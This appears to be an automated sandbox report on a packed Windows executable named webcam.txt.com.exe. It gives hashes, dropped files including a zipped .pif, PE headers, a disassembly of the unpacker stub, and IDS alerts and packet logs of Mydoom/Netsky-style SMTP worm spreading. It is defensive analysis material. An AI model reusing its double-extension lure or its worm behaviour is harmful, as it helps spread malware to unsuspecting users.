                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25483
                                                                                                                                                                                                          Entropy (8bit):7.6706527551267945
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:rkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+G:8QWN7y3QLPfg9R0F3+G
                                                                                                                                                                                                          MD5:C781A4CDC85AB3D4665CDF2AC6095C2B
                                                                                                                                                                                                          SHA1:452BD8747026E2642DEA8B336C21DB55C9BD5F48
                                                                                                                                                                                                          SHA-256:EBDD407C707FE3525903FAFA551616038A6FD9A91677B1456237D72B53E829F7
                                                                                                                                                                                                          SHA-512:760118F20005835EC94EAA60F4AD2884CF6AB73C6E364AB9B93EB316B797C0974381B2F3B5D2D4F2218103D4903F30750CBF1EE0817D82C79A111009D0A88554
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:PK...........1bd...c...c......privacy_tear.pifMZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`.....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:webcam.txt.com.exe
                                                                                                                                                                                                          File size:25'353 bytes
                                                                                                                                                                                                          MD5:0e17dbec1904b7c10614bfb29ef758fd
                                                                                                                                                                                                          SHA1:b19765f00d764e9feae654c9223d124b1a874361
                                                                                                                                                                                                          SHA256:b9b8e6d43ce8770733b490d6b98c61f84ae5d5d9e170ada6f034128d0ba9085f
                                                                                                                                                                                                          SHA512:6dd92cf0d1d828880f1ed476f64fa746c6dcc2e9cbcaf369182bf5e4e096068458402d3e3d080f97ce6ae4762a2219443fc43730cb0e207e5ec14a3be27b6a34
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          TLSH:51B2D0A9F5CFB9A5CD2D6373003A048CAB751E061EBA0FEF18957E9A28381C94C2503D
                                                                                                                                                                                                          File Content Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L.....;@.................P..........B........`....@................
                                                                                                                                                                                                          Icon Hash:c3d391918fa3e9c8
                                                                                                                                                                                                          Entrypoint:0x41a042
                                                                                                                                                                                                          Entrypoint Section:
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                          Time Stamp:0x403BA7EC [Tue Feb 24 19:37:16 2004 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:413a406840de138bccb9a1afd8315434
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov eax, 0041A000h
                                                                                                                                                                                                          push 0040708Bh
                                                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                                                          mov dword ptr fs:[00000000h], esp
                                                                                                                                                                                                          pushf
                                                                                                                                                                                                          pushad
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          push 00400000h
                                                                                                                                                                                                          mov edi, dword ptr [esp]
                                                                                                                                                                                                          mov esi, dword ptr [eax]
                                                                                                                                                                                                          add di, 0780h
                                                                                                                                                                                                          lea esi, dword ptr [esi+eax+08h]
                                                                                                                                                                                                          mov dword ptr [eax], edi
                                                                                                                                                                                                          mov ebx, dword ptr [esi+10h]
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          push 00000002h
                                                                                                                                                                                                          push 00000880h
                                                                                                                                                                                                          push edi
                                                                                                                                                                                                          push 00000013h
                                                                                                                                                                                                          push 00000006h
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          push 00000004h
                                                                                                                                                                                                          push 00000880h
                                                                                                                                                                                                          push edi
                                                                                                                                                                                                          call ebx
                                                                                                                                                                                                          sub esi, 08h
                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                          add di, 0068h
                                                                                                                                                                                                          add esi, 000000C2h
                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                          call ebx
                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                          lea edx, dword ptr [eax+000001B8h]
                                                                                                                                                                                                          mov ecx, dword ptr [edx]
                                                                                                                                                                                                          btr ecx, 1Fh
                                                                                                                                                                                                          jnc 00007F4CBC833718h
                                                                                                                                                                                                          mov eax, dword ptr [esp]
                                                                                                                                                                                                          std
                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                          mov edi, eax
                                                                                                                                                                                                          add esi, dword ptr [edx+04h]
                                                                                                                                                                                                          add edi, dword ptr [edx+08h]
                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                          add edx, 0Ch
                                                                                                                                                                                                          cld
                                                                                                                                                                                                          jmp 00007F4CBC8336E4h
                                                                                                                                                                                                          add edx, 10h
                                                                                                                                                                                                          mov ebx, dword ptr [edx-0Ch]
                                                                                                                                                                                                          test ebx, ebx
                                                                                                                                                                                                          je 00007F4CBC8336DAh
                                                                                                                                                                                                          mov eax, dword ptr [esp]
                                                                                                                                                                                                          mov edi, dword ptr [edx-08h]
                                                                                                                                                                                                          add edi, eax
                                                                                                                                                                                                          push edx
                                                                                                                                                                                                          lea esi, dword ptr [ecx+eax]
                                                                                                                                                                                                          jmp 00007F4CBC833719h
                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                          pop edx
                                                                                                                                                                                                          je 00007F4CBC8336C6h
                                                                                                                                                                                                          jmp 00007F4CBC833621h
                                                                                                                                                                                                          add dl, dl
                                                                                                                                                                                                          jne 00007F4CBC833709h
                                                                                                                                                                                                          mov dl, byte ptr [esi]
                                                                                                                                                                                                          sub esi, FFFFFFFFh
                                                                                                                                                                                                          adc dl, dl
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          cmp ebx, 00010000h
                                                                                                                                                                                                          jnc 00007F4CBC833710h
                                                                                                                                                                                                          push FFFFC060h
                                                                                                                                                                                                          push FFFFFC60h
                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1a1fc0x1af
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x508.petite
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          0x10000x180000x5600False0.9855105377906976data7.930690770928366IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .petite0x190000x10000x508False0.3144409937888199data3.7828471556838457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          0x1a0000x3ab0x400False0.69921875data5.380392509344554IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                          RT_ICON0x190d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640GermanGermany0.2956989247311828
                                                                                                                                                                                                          RT_ICON0x193b80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192GermanGermany0.40202702702702703
                                                                                                                                                                                                          RT_GROUP_ICON0x194e00x22dataGermanGermany1.0
                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          USER32.dllMessageBoxA, wsprintfA
                                                                                                                                                                                                          KERNEL32.dllExitProcess, LoadLibraryA, GetProcAddress, VirtualProtect
                                                                                                                                                                                                          WININET.dllInternetGetConnectedState
                                                                                                                                                                                                          WS2_32.dllinet_addr
                                                                                                                                                                                                          iphlpapi.dllGetNetworkParams
                                                                                                                                                                                                          ADVAPI32.dllRegOpenKeyA
                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                          GermanGermany
                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          192.168.2.4172.253.115.2749738252810644 12/04/23-12:57:10.044750TCP2810644ETPRO TROJAN Worm.Mydoom spreading via SMTP 284973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          192.168.2.4172.253.115.2749739252810641 12/04/23-12:57:10.143329TCP2810641ETPRO TROJAN Worm.Mydoom spreading via SMTP 254973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          192.168.2.485.187.148.249748252810645 12/04/23-12:59:08.468348TCP2810645ETPRO TROJAN Worm.Mydoom spreading via SMTP 294974825192.168.2.485.187.148.2
                                                                                                                                                                                                          192.168.2.4142.251.16.2749758252810641 12/04/23-12:59:56.847271TCP2810641ETPRO TROJAN Worm.Mydoom spreading via SMTP 254975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          192.168.2.4142.251.16.2749767252810645 12/04/23-13:00:15.447869TCP2810645ETPRO TROJAN Worm.Mydoom spreading via SMTP 294976725192.168.2.4142.251.16.27
                                                                                                                                                                                                          192.168.2.4172.253.115.2749736252810646 12/04/23-12:57:10.151702TCP2810646ETPRO TROJAN Worm.Mydoom spreading via SMTP 304973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          192.168.2.4142.251.16.2749759252806859 12/04/23-12:59:56.770680TCP2806859ETPRO TROJAN Worm.Win32/Netsky.P@mm spreading via SMTP 14975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          192.168.2.4185.183.28.23549744252810641 12/04/23-12:58:05.193819TCP2810641ETPRO TROJAN Worm.Mydoom spreading via SMTP 254974425192.168.2.4185.183.28.235
                                                                                                                                                                                                          192.168.2.4142.251.167.2649763252810643 12/04/23-13:00:06.727890TCP2810643ETPRO TROJAN Worm.Mydoom spreading via SMTP 274976325192.168.2.4142.251.167.26
                                                                                                                                                                                                          192.168.2.4142.251.16.2749768252810644 12/04/23-13:00:15.434600TCP2810644ETPRO TROJAN Worm.Mydoom spreading via SMTP 284976825192.168.2.4142.251.16.27
                                                                                                                                                                                                          192.168.2.467.195.204.7349729252810646 12/04/23-12:56:39.672732TCP2810646ETPRO TROJAN Worm.Mydoom spreading via SMTP 304972925192.168.2.467.195.204.73
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.833709955 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.943500996 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.943613052 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.175481081 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.176533937 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.286206007 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.286237955 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.288876057 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.399158955 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.401060104 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.511563063 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.512382984 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.622129917 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.632194996 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.672732115 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.735950947 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.782159090 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.782423019 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.782474041 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.842411995 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.846038103 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.846682072 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.892178059 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.892982960 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.952105045 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.953135967 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.963812113 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.964051008 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.002749920 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.003458023 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.063623905 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.064536095 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.073892117 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.074059010 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.113154888 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.113790035 CET4972925192.168.2.467.195.204.73
